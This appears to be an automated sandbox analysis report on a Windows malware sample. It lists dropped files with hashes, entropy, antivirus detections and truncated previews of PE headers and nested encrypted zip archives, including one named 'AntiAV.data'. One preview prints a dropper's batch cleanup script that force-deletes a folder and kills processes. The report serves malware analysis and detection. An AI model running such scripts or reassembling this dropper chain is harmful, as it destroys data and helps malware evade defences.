                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2976768
                                                                                                                                                                                                                                        Entropy (8bit):6.604000270845258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:nZNt60MWKf4ZmSXyOQqcxSdj04drGcnaj0GpmeogTOpGg:nZNt66Kf4Zm4yOraSd44ZGEaoGpkzGg
                                                                                                                                                                                                                                        MD5:61CB850896F4B6AAC18C72E82EB9AC90
                                                                                                                                                                                                                                        SHA1:C1FCDD242B13E4C5AD99F7E76DA886288622B6DC
                                                                                                                                                                                                                                        SHA-256:C2BEE3616CF5C0F19ECC5738EE39A8C3D0D0523C2178177B86563D5A3D758D0F
                                                                                                                                                                                                                                        SHA-512:D156751D3D9E353A116E55CBC9A9E87DA03A4D29EFE529344CE996324EC361F0472724BB8162C2BE7EA6F291AAF2F7CBBC8659672777E182E40283FA661A2043
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@..........................@1.......-...@.................................W...k.............................0.............................L.0..................................................... . ............................@....rsrc...............................@....idata ............................@...qnusxmvo.P*......P*.................@...fqlahttk......1......F-.............@....taggant.0....1.."...J-.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1679360
                                                                                                                                                                                                                                        Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                                        MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                        SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                        SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                        SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):468992
                                                                                                                                                                                                                                        Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                                                        MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                        SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                        SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):222
                                                                                                                                                                                                                                        Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                                                        MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                        SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                        SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                        SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2355713
                                                                                                                                                                                                                                        Entropy (8bit):5.891648193754473
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                                                                        MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                                                        SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                                                        SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                                                        SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1799594
                                                                                                                                                                                                                                        Entropy (8bit):7.99773141173711
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                                                                                        MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                                                                        SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                                                                        SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                                                                        SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1799748
                                                                                                                                                                                                                                        Entropy (8bit):7.997729415613798
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                                                                                                        MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                                                                        SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                                                                        SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                                                                        SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1799902
                                                                                                                                                                                                                                        Entropy (8bit):7.997726708945573
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                                                                                        MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                                                                        SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                                                                        SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                                                                        SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1800056
                                                                                                                                                                                                                                        Entropy (8bit):7.997723543142523
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                                                                                        MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                                                                        SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                                                                        SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                                                                        SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1800210
                                                                                                                                                                                                                                        Entropy (8bit):7.997720745184939
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                                                                                        MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                                                                        SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                                                                        SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                                                                        SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1800364
                                                                                                                                                                                                                                        Entropy (8bit):7.997716835838842
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                                                                        MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                                                        SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                                                        SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                                                        SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3473559
                                                                                                                                                                                                                                        Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                                                                        MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                                                        SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                                                        SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                                                        SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1827328
                                                                                                                                                                                                                                        Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                                        MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                        SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                        SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                        SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
